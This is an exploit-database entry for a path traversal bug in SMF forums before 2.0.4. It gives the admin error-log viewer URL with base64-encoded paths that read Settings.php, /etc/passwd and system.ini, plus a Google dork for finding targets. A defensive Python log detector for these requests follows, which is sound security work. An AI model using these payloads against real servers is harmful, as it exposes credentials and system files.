Vendor: SMF
By: NightlyDev
CVSS: 7.5 (HIGH)
CWE-22: Path Traversal
Product Name: SMF
Affected Version From: 2.0.x
Affected Version To: 2.0.4
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 6.2
2013

SMF < 2.0.4 File Disclosure/Path Traversal

This exploit allows an attacker to read sensitive files on the server, such as configuration files, by passing a base64-encoded file path in the 'file' parameter of the admin error log viewer. The attacker needs the 'admin_forum' privilege to exploit this vulnerability.

Mitigation:

Ensure that the 'admin_forum' privilege is not given to any user that should not have access to sensitive files. Additionally, upgrade to SMF version 2.0.4 or later.

Exploit-DB raw data:

# Exploit Title: SMF < 2.0.4 File Disclosure/Path Traversal
# Google Dork: "Powered by SMF 2.0.x"
# Date: 02/02/2013
# Exploit Author: NightlyDev
# Software Link: http://download.simplemachines.org/index.php?thanks;filename=smf_2-0-3_install.zip
# Version: 2.0.x < 2.0.4
# Tested on: CentOS 6.2

 _   _ _       _     _   _        _____          _               
| \ | (_)     | |   | | | |      / ____|        | |              
|  \| |_  __ _| |__ | |_| |_   _| |     ___   __| | ___ _ __ ___ 
| . ` | |/ _` | '_ \| __| | | | | |    / _ \ / _` |/ _ \ '__/ __|
| |\  | | (_| | | | | |_| | |_| | |___| (_) | (_| |  __/ |  \__ \
|_| \_|_|\__, |_| |_|\__|_|\__, |\_____\___/ \__,_|\___|_|  |___/
          __/ |             __/ |                                
         |___/             |___/                                 
		 

You need the "admin_forum" privilege for this exploit.

http://<server>/index.php?action=admin;area=logs;sa=errorlog;file=[BASE64 ENCODED FILE PATH];line=[LINE NUMBER]

Example :

/srv/www/smf/Settings.php : L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA= 

/etc/passwd : L2V0Yy9wYXNzd2Q=


SMF Configuration File Disclosure : 

file=L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA=;line=40

/etc/passwd File : 

file=L2V0Yy9wYXNzd2Q=;line=1

C:\Windows\system.ini

file=QzpcV2luZG93c1xzeXN0ZW0uaW5p;line=1


NightlyDev.
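
A detection-side view of the request format above, as an added example that is not part of the original advisory or SMF's own code: it decodes the 'file' parameter of error-log viewer requests and flags decoded paths that fall outside the forum directory or name Settings.php. FORUM_ROOT, the function names and the sample request lines are assumptions constructed here; the decoder re-pads the value because PHP's decoder accepts short padding, as in the first example string above.

```python
import base64
import posixpath
from urllib.parse import unquote

# Assumption: the forum's install directory, taken from the page's example path.
FORUM_ROOT = "/srv/www/smf"

def parse_smf_query(query):
    """Split an SMF query string; SMF separates parameters with ';' as well as '&'."""
    pairs = (p.partition("=") for p in query.replace("&", ";").split(";"))
    return {k: unquote(v) for k, _, v in pairs}  # base64 '=' padding stays in v

def decode_file_param(value):
    """Decode the file parameter, tolerating short padding as PHP's decoder does."""
    stripped = value.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def classify(request_path):
    """Return (decoded_path, verdict) for an error-log viewer request, else None."""
    params = parse_smf_query(request_path.partition("?")[2])
    if params.get("sa") != "errorlog" or "file" not in params:
        return None
    decoded = decode_file_param(params["file"])
    if decoded is None:
        return (None, "undecodable")
    normalized = posixpath.normpath(decoded.replace("\\", "/"))
    if normalized != FORUM_ROOT and not normalized.startswith(FORUM_ROOT + "/"):
        return (decoded, "outside-root")
    if posixpath.basename(normalized) == "Settings.php":
        return (decoded, "config-file")
    return (decoded, "ok")

# Constructed request lines: file values quoted on this page, plus one in-root file.
PREFIX = "/index.php?action=admin;area=logs;sa=errorlog;file="
SAMPLE_REQUESTS = [
    PREFIX + "L2V0Yy9wYXNzd2Q=;line=1",
    PREFIX + "L3Nydi93d3cvc21mL1NldHRpbmdzLnBocA=;line=40",
    PREFIX + "QzpcV2luZG93c1xzeXN0ZW0uaW5p;line=1",
    PREFIX + base64.b64encode(b"/srv/www/smf/Sources/Load.php").decode() + ";line=10",
    "/index.php?action=profile;u=1",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req), req)
```

Run against web server access logs, the "outside-root" and "config-file" verdicts are the ones to alert on, alongside a review of which accounts hold 'admin_forum'.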